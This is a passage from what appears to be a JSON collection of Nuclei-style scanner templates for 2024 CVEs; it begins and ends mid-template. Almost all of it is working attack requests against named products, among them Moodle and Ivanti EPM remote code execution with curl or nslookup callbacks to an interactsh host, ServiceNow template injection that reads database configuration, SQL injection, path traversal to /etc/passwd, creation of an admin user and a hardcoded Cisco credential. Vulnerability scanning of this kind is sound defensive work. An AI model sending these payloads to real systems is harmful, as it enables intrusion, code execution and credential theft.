xmlns:b=\"http://schemas.datacontract.org/2004/07/WUGDataAccess.Core.DataContracts\"><b:DailyDays>1</b:DailyDays><b:DailyOptions>Interval</b:DailyOptions><b:DaysOfTheWeek xmlns:c=\"http://schemas.microsoft.com/2003/10/Serialization/Arrays\"><c:boolean>true</c:boolean><c:boolean>true</c:boolean><c:boolean>true</c:boolean><c:boolean>true</c:boolean><c:boolean>true</c:boolean><c:boolean>true</c:boolean><c:boolean>true</c:boolean></b:DaysOfTheWeek><b:MonthlyDayMonths>1</b:MonthlyDayMonths><b:MonthlyDayNumber>3</b:MonthlyDayNumber><b:MonthlyOptions>DayOfMonth</b:MonthlyOptions><b:MonthlyRecur>First</b:MonthlyRecur><b:MonthlyRecurDay>Sunday</b:MonthlyRecurDay><b:MonthlyRecurMonths>1</b:MonthlyRecurMonths><b:RecurringInterval>1</b:RecurringInterval><b:RecurringTimeIntervals>Minutes</b:RecurringTimeIntervals><b:ScheduleType>TimeInterval</b:ScheduleType><b:StartTime>2024-07-05T16:59:14.047957+01:00</b:StartTime><b:TimeIntervalStartDate>2024-07-05T16:59:14.047957+01:00</b:TimeIntervalStartDate><b:WeeklyWeeks>1</b:WeeklyWeeks><b:YearlyDayOfMonth>3</b:YearlyDayOfMonth><b:YearlyMonthRecur>First</b:YearlyMonthRecur><b:YearlyMonthRecurDay>Sunday</b:YearlyMonthRecurDay><b:YearlyMonths>March</b:YearlyMonths><b:YearlyOptions>DayOfYear</b:YearlyOptions><b:YearlyRecurMonth>March</b:YearlyRecurMonth></a:Schedule><a:URL>{\"title\":\"foo\",\"renderType\":\"aspx\",\"reports\":[{\"title\":\"thetitle\",\"url\":\"/NmConsole/api/Wireless/ReportWirelessLog\",\"dateRangeFilter\":{\"label\":\"Date Range\",\"n\":0,\"range\":\"Today\",\"text\":\"Today\"},\"severityFilter\":{\"label\":\"Severity\",\"value\":-1,\"text\":\"ALL\"},\"limit\":50,\"grid\":{\"emptyText\":\"[ No records found ]\",\"columns\":[{\"dataIndex\":\"Date\",\"text\":\"Date\",\"flex\":1},{\"dataIndex\":\"Severity\",\"text\":\"Severity\",\"flex\":1},{\"dataIndex\":\"Message\",\"text\":\"Message\",\"flex\":1}],\"filters\":[],\"sorters\":[]}}],\"baseUrl\":\"http://{{interactsh-url}}\",\"userId\":1}</a:URL><a:WebUserID>1</a:WebUserID><a:WebUserName>admin</a:WebUserName></rr></TestRecurringReport></s:Body></s:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["sPassword"]}]}]},{"id":"CVE-2024-3097","info":{"name":"NextGEN Gallery <= 3.59 - Missing Authorization to Unauthenticated Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/ngg/v1/admin/block/image/1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"success\":","\"image\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-43425","info":{"name":"Moodle - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /login/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nanchor=&logintoken={{token}}&username={{username}}&password={{password}}\n"],"host-redirects":true,"extractors":[{"type":"regex","part":"body","name":"token","group":1,"regex":["name=\"logintoken\" value=\"([a-zA-Z0-9]+)\">"],"internal":true}]},{"raw":["GET /my/courses.php HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"sesskey","part":"body","internal":true,"group":1,"regex":["\"sesskey\":\"([^\"]+)\""]}]},{"raw":["POST /lib/ajax/service.php?sesskey={{sesskey}}&info=core_course_get_enrolled_courses_by_timeline_classification HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n[{\"index\":0,\"methodname\":\"core_course_get_enrolled_courses_by_timeline_classification\",\"args\":{\"offset\":0,\"limit\":0,\"classification\":\"all\",\"sort\":\"fullname\",\"customfieldname\":\"\",\"customfieldvalue\":\"\",\"requiredfields\":[\"id\",\"fullname\",\"shortname\",\"showcoursecategory\",\"showshortname\",\"visible\",\"enddate\"]}}]\n"],"extractors":[{"type":"json","part":"body","name":"courseid","json":[".[].data.courses[0].id"],"internal":true}]},{"raw":["POST /question/bank/editquestion/question.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ninitialcategory=1&reload=1&shuffleanswers=1&answernumbering=abc&mform_isexpanded_id_answerhdr=1&noanswers=1&nounits=1&numhints=2&synchronize=&wizard=datasetdefinitions&id=&inpopup=0&cmid=&courseid={{courseid}}&returnurl=%2Fquestion%2Fedit.php%3Fcourseid%3D2%26deleteall%3D1&mdlscrollto=0&appendqnumstring=&qtype=calculated&makecopy=0&sesskey={{sesskey}}&_qf__qtype_calculated_edit_form=1&mform_isexpanded_id_generalheader=1&mform_isexpanded_id_unithandling=1&mform_isexpanded_id_unithdr=1&mform_isexpanded_id_multitriesheader=1&mform_isexpanded_id_tagsheader=1&category=2%2C11&name=aaaaaaa&questiontext%5Btext%5D=%3Cp%3Edsaszzzzzzzzda%3C%2Fp%3E&questiontext%5Bformat%5D=1&questiontext%5Bitemid%5D=471779994&status=ready&defaultmark=1&generalfeedback%5Btext%5D=&generalfeedback%5Bformat%5D=1&generalfeedback%5Bitemid%5D=318048148&idnumber=&answer%5B0%5D=%281%29-%3E%7Bsystem%28%24_GET%5Bchr%2897%29%5D%29%7D&fraction%5B0%5D=1.0&tolerance%5B0%5D=0.01&tolerancetype%5B0%5D=1&correctanswerlength%5B0%5D=2&correctanswerformat%5B0%5D=1&feedback%5B0%5D%5Btext%5D=&feedback%5B0%5D%5Bformat%5D=1&feedback%5B0%5D%5Bitemid%5D=238751667&unitrole=3&penalty=0.3333333&hint%5B0%5D%5Btext%5D=%3Cp%3Eas%3C%2Fp%3E&hint%5B0%5D%5Bformat%5D=1&hint%5B0%5D%5Bitemid%5D=653998899&hint%5B1%5D%5Btext%5D=&hint%5B1%5D%5Bformat%5D=1&hint%5B1%5D%5Bitemid%5D=161289221&tags=_qf__force_multiselect_submission&submitbutton=Save+changes\n"],"extractors":[{"type":"regex","part":"header","name":"id","group":1,"internal":true,"regex":["&id=([0-9]+)&"]}]},{"raw":["POST /question/bank/editquestion/question.php?wizardnow=datasetdefinitions HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid={{id}}&inpopup=0&cmid=&courseid={{courseid}}&returnurl=%2Fquestion%2Fedit.php%3Fcourseid%3D2%26deleteall%3D1&mdlscrollto=0&appendqnumstring=&category=2%2C11&wizard=datasetitems&sesskey={{sesskey}}&_qf__question_dataset_dependent_definitions_form=1&dataset%5B0%5D=0&synchronize=0&submitbutton=Next+page\n"],"extractors":[{"type":"regex","part":"header","name":"rceurl","group":1,"internal":true,"regex":["Location: https?://.*?/question/(.*)&returnurl"]}]},{"raw":["GET /question/{{rceurl}}&a=curl%20{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-4257","info":{"name":"BlueNet Technology Clinical Browsing System 1.2.1 - Sql Injection","severity":"medium"},"requests":[{"raw":["GET /login.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"<title>\u4e34\u5e8a\u6d4f\u89c8</title>\")","contains(header,\"text/html\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["@timeout 20s\nGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:6%27-- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains(header,\"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-45622","info":{"name":"ASIS - SQL Injection Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /asispanel/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"<title>ASIS | Aplikasi Sistem Sekolah </title>\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["POST /asispanel/login/cek HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=%27+or+0%3D0+%23%23&password={{pass}}&submit=&submit=\n"],"matchers":[{"type":"dsl","dsl":["status_code == 303"],"condition":"and","internal":true}]},{"raw":["GET /asispanel/home HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"Logout\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-9014","info":{"name":"pgAdmin 4 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /login?next=/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","negative":true,"regex":["OAUTH2_CLIENT_SECRET\": null"]},{"type":"word","part":"body","words":["<title>pgAdmin 4</title>","OAUTH2_CLIENT_SECRET"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-7593","info":{"name":"Ivanti vTM - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /apps/zxtm/wizard.fcgi?error=1&section=Access+Management%3ALocalUsers HTTP/1.1\nHost: {{Hostname}}\n\n_form_submitted=form&create_user=Create&group=admin&newusername={{username}}&password1={{password}}&password2={{password}}\n"],"matchers":[{"type":"word","part":"body","words":["wizardtitletext"],"internal":true}]},{"raw":["@timeout: 15s\nPOST /apps/zxtm/login.cgi HTTP/1.1\nHost: {{Hostname}}\nOrigin: {[RootURL]}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarycznFUOqD0Y01A9B5\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nReferer: {{RootURL}}/apps/zxtm/login.cgi\n\n------WebKitFormBoundarycznFUOqD0Y01A9B5\nContent-Disposition: form-data; name=\"_form_submitted\"\n\nform\n------WebKitFormBoundarycznFUOqD0Y01A9B5\nContent-Disposition: form-data; name=\"form_username\"\n\n{{username}}\n------WebKitFormBoundarycznFUOqD0Y01A9B5\nContent-Disposition: form-data; name=\"form_password\"\n\n{{password}}\n------WebKitFormBoundarycznFUOqD0Y01A9B5\nContent-Disposition: form-data; name=\"form_submit\"\n\nLogin\n------WebKitFormBoundarycznFUOqD0Y01A9B5--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: /apps/zxtm/","Set-Cookie: ZeusTMZAUTH=","Set-Cookie: ZeusTMZAUTHTIME="],"condition":"and"},{"type":"status","status":[302]}],"extractors":[{"type":"dsl","dsl":["\"USER: \"+ username","\"PASS: \"+ password"]}]}]},{"id":"CVE-2024-32964","info":{"name":"Lobe Chat <= v0.150.5 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["GET /welcome HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["contains(tolower(body), \"lobechat\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["POST /api/proxy HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/plain\n\nhttp://oast.me\n"],"matchers":[{"type":"word","part":"response","words":["<h1> Interactsh Server </h1>"]}]}]},{"id":"CVE-2024-21644","info":{"name":"pyLoad Flask Config - Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/render/info.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["&#39;SECRET_KEY&#39;:","&#39;pyload_session&#39;"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-1698","info":{"name":"NotificationX <= 2.8.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout 10s\nPOST /wp-json/notificationx/v1/analytics HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"nx_id\": \"1\",\"type\": \"clicks`=1 and 1=sleep(5)-- -\"}\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(body, \"{\\\"success\\\":true}\")","contains(header, \"application/json\")"],"condition":"and"}]}]},{"id":"CVE-2024-32399","info":{"name":"RaidenMAILD Mail Server v.4.9.4 - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webeditor/../../../windows/win.ini"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"[fonts]\", \"for 16-bit app support\")","contains(header, \"application/octet-stream\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-7340","info":{"name":"W&B Weave Server - Remote Arbitrary File Leak","severity":"high"},"requests":[{"raw":["GET /__weave/file/tmp/weave/fs/../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["application/octet-stream","filename=passwd"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-1208","info":{"name":"LearnDash LMS < 4.10.3 - Sensitive Information Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/sfwd-question"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","\"question_type\":","\"points_total\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-5217","info":{"name":"ServiceNow - Incomplete Input Validation","severity":"critical"},"requests":[{"raw":["GET /login.do?jvar_page_title=<style><j:jelly+xmlns:j=\"jelly:core\"+xmlns:g='glide'><g:evaluate>z=new+Packages.java.io.File(\"\").getAbsolutePath();z=z.substring(0,z.lastIndexOf(\"/\"));u=new+SecurelyAccess(z.concat(\"/co..nf/glide.db.properties\")).getBufferedReader();s=\"\";while((q=u.readLine())!==null)s=s.concat(q,\"\\n\");gs.addErrorMessage(s);</g:evaluate></j:jelly></style> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["glide.db.user"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-29824","info":{"name":"Ivanti EPM - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /WSStatusEvents/EventHandler.asmx HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/soap+xml\n\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<soap12:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap12=\"http://www.w3.org/2003/05/soap-envelope\">\n  <soap12:Body>\n    <UpdateStatusEvents xmlns=\"http://tempuri.org/\">\n      <deviceID>string</deviceID>\n      <actions>\n        <Action name=\"string\" code=\"0\" date=\"0\" type=\"96\" user=\"string\" configguid=\"string\" location=\"string\">\n          <status>GoodApp=1|md5='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'nslookup {{interactsh-url}}'--</status>\n        </Action>\n      </actions>\n    </UpdateStatusEvents>\n  </soap12:Body>\n</soap12:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"content_type","words":["application/soap+xml"]},{"type":"word","part":"body","words":["UpdateStatusEventsResponse"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-4879","info":{"name":"ServiceNow UI Macros - Template Injection","severity":"unknown"},"requests":[{"raw":["GET /login.do?jvar_page_title=<style><j:jelly%20xmlns:j=\"jelly\"%20xmlns:g=%27glide%27><g:evaluate>gs.addErrorMessage(1337*1337);</g:evaluate></j:jelly></style> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<div class=\"outputmsg_text\">1787569</div>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6646","info":{"name":"Netgear-WN604 downloadFile.php -  Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/downloadFile.php?file=config"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["system:basicSettings","system:staSettings"],"condition":"and"},{"type":"word","part":"content_type","words":["application/force-download"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-7029","info":{"name":"AVTECH IP Camera - Command Injection","severity":"high"},"requests":[{"raw":["POST /cgi-bin/supervisor/Factory.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=white_led&brightness=$(echo%20{{string}}+2>&1)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{string}}"]},{"type":"word","part":"content_type","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-27199","info":{"name":"TeamCity < 2023.11.4 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/res/../admin/diagnostic.jsp","{{BaseURL}}/.well-known/acme-challenge/../../admin/diagnostic.jsp","{{BaseURL}}/update/../admin/diagnostic.jsp"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains_all(body, \"Debug Logging\", \"CPU & Memory Usage\")"],"condition":"and"}]}]},{"id":"CVE-2024-6366","info":{"name":"User Profile Builder < 3.11.8 - File Upload","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/plugins/profile-builder\")"],"internal":true}]},{"raw":["POST /wp-admin/async-upload.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW\n\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"wppb_upload\"\n\ntrue\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"meta_name\"\n\n{{filename}}.gif\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"_wpnonce\"\n\ne8\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"action\"\n\nupload-attachment\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"async-upload\"; filename=\"{{filename}}.gif\"\nContent-Type: image/jpeg\n\nGIF89a\n\n------WebKitFormBoundary7MA4YWxkTrZu0gW--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"success\":true","\"id\"","\"uploadedTo\""],"condition":"and"},{"type":"word","part":"header","words":["Content-Type: text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-31982","info":{"name":"XWiki < 4.10.20 - Remote code execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20","{{BaseURL}}/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20"],"skip-variables-check":true,"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains_all(body, \"Hello from search text:42</title>\", \"<title>RSS feed\")","contains(header, \"text/javascript\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-25852","info":{"name":"Linksys RE7000 - Command Injection","severity":"high"},"requests":[{"raw":["PUT /goform/AccessControl HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"AccessPolicy\":\"0\",\"AccessControlList\":\"`ps>/etc_ro/lighttpd/RE7000_www/{{filename}}.txt`\"}\n"]},{"raw":["GET /{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body_1,\"result\",\"success\") && contains_all(body_2,\"PID\",\"USER\",\"VSZ\",\"STAT\",\"COMMAND\")","status_code_1 == 200 && status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2024-31851","info":{"name":"CData Sync < 23.4.8843 - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.rst"],"matchers":[{"type":"word","internal":true,"words":["<title>CData - Sync"]}]},{"raw":["GET /ui/..\\src\\getSettings.rsb?@json HTTP/1.1\nHost: {{Hostname}}\nReferer: {{RootURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"items\":[{",":\"true\"","notifyemail"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-38289","info":{"name":"TurboMeeting - Boolean-based SQL Injection","severity":"critical"},"requests":[{"raw":["POST /as/wapi/vmp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmeeting_id=1'/**/OR/**/1=1/**/UNION/**/select/**/password/**/from/**/employee/**/where/**/email='admin'/**/AND/**/substr(password,2,1)='b'/**\n","POST /as/wapi/vmp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmeeting_id=1'/**/OR/**/1=2/**/UNION/**/select/**/password/**/from/**/employee/**/where/**/email='admin'/**/AND/**/substr(password,2,1)='b'/**\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["<__Status__>SUCCEED</__Status__>"]},{"type":"word","part":"body_2","words":["<__Status__>FAILED</__Status__>"]}]}]},{"id":"CVE-2024-4348","info":{"name":"osCommerce v4.0 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/furniture/catalog/all-products?cat=1&bhl4n%2522%253e%253cScRiPt%253ealert%2528'document_domain'%2529%253c%252fScRiPt%253eiyehb=1","{{BaseURL}}/watch/catalog/all-products?cat=1&bhl4n%2522%253e%253cScRiPt%253ealert%2528'document_domain'%2529%253c%252fScRiPt%253eiyehb=1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<ScRiPt>alert('document_domain')</ScRiPt>","Listing of all products on the site"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6289","info":{"name":"WPS Hide Login < 1.9.16.4 - Hidden Login Page Disclosure","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/wps-hide-login/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"WPS Hide Login\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /?gf_page={{string}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["!contains(tolower(location), \"wp-login.php\")","contains(header,\"%2F%3Fgf_page%3D{{string}}&reauth=1\")"],"condition":"and"}],"extractors":[{"type":"kval","kval":["location"]}]}]},{"id":"CVE-2024-3822","info":{"name":"Base64 Encoder/Decoder <= 0.9.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/base64-encoderdecoder/base64-decode.php?string=PHNjcmlwdD5hbGVydCgiZG9jdW1lbnQuZG9tYWluIik8L3NjcmlwdD4="],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains(body, \"<p><script>alert(\\\"document.domain\\\")</script></p>\")"],"condition":"and"}]}]},{"id":"CVE-2024-33575","info":{"name":"User Meta WP Plugin < 3.1 - Sensitive Information Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/user-meta/views/debug.php"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"um-debug<br/>\")"],"condition":"and"}]}]},{"id":"CVE-2024-36991","info":{"name":"Splunk Enterprise - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /en-US/login HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"Splunk Inc.\")"],"condition":"and","internal":true}]},{"raw":["GET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../Windows/win.ini HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2024-20439","info":{"name":"Hardcoded Admin Credentials For Cisco Smart Licensing Utility API","severity":"critical"},"requests":[{"raw":["GET /cslu/v1/scheduler/jobs HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic Y3NsdS13aW5kb3dzLWNsaWVudDpMaWJyYXJ5NEMkTFU=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"job_name\":","\"current_status\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-38472","info":{"name":"Apache HTTPd Windows UNC - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5C%5C{{interactsh-url}}/apachehttpd"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"interactsh_request","words":["/apachehttpd"]}]}]},{"id":"CVE-2024-45388","info":{"name":"Hoverfly < 1.10.3 - Arbitrary File Read","severity":"high"},"requests":[{"raw":["PUT /api/v2/simulation HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"data\":{\"pairs\":[{\"request\":{},\"response\":{\"bodyFile\": \"../../../../../../../etc/passwd\",\"x\":\"aaa\"}} ]},\"meta\":{\"schemaVersion\":\"v5.3\"}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","hoverflyVersion"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-7188","info":{"name":"Bylancer Quicklancer 2.4 G - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout 30s\nGET /listing?cat=6&filter=1&job-type=1&keywords=Mr.&location=1&order=desc&placeid=US&placetype=country&range1=1&range2=1)%20AND%20(SELECT%201864%20FROM%20(SELECT(SLEEP(6)))gOGh)%20AND%20(6900=6900&salary-type=1&sort=id&subcat HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type,\"text/html\")","contains_all(body,\"og:site_name\",\"og:locale\",\"range2\")"],"condition":"and"}]}]},{"id":"CVE-2024-29868","info":{"name":"Apache StreamPipes <= 0.93.0 - Use of Cryptographically Weak PRNG in Recovery Token Generation","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/streampipes-backend/api/v2/auth/settings"],"headers":{"User-Agent":"{{randstr}}"},"extractors":[{"type":"json","part":"body","name":"settings","group":1,"json":["if .allowPasswordRecovery==true and .allowSelfRegistration==true then true else false end"],"internal":true}]},{"method":"GET","path":["{{BaseURL}}/streampipes-backend/api/openapi.json"],"headers":{"User-Agent":"{{randstr}}"},"extractors":[{"type":"json","part":"body","name":"version","group":1,"json":[".info.version"],"internal":true}],"matchers":[{"type":"dsl","dsl":["contains(settings, true)","compare_versions(version, '>= 0.69.0') && compare_versions(version, '<= 0.93.0')"],"condition":"and"}]}]},{"id":"CVE-2024-43160","info":{"name":"BerqWP <= 1.7.6 - Arbitrary File Uplaod","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/wp-content/plugins/searchpro\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["POST /wp-json/optifer/v1/store-webp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nimage=\"{{base64(num)}}\"&url={{filename}}.txt&license_key_hash=d41d8cd98f00b204e9800998ecf8427e\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type,\"application/json\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"{{num}}\")","contains(content_type, \"text/plain\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-6586","info":{"name":"Lightdash v0.1024.6 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /api/v1/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"email\":\"{{username}}\",\"password\":\"{{password}}\"}\n"]},{"raw":["GET /api/v1/org/projects HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"json","name":"projectuuid","part":"body","json":[".results[0].projectUuid"],"internal":true}]},{"raw":["POST /api/v1/projects/{{projectuuid}}/dashboards HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\":\"Test\",\"description\":\"Test\",\"tiles\":[]}\n"],"extractors":[{"type":"json","name":"dashuuid","part":"body","json":[".results.uuid"],"internal":true}]},{"raw":["PATCH /api/v1/dashboards/{{dashuuid}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: 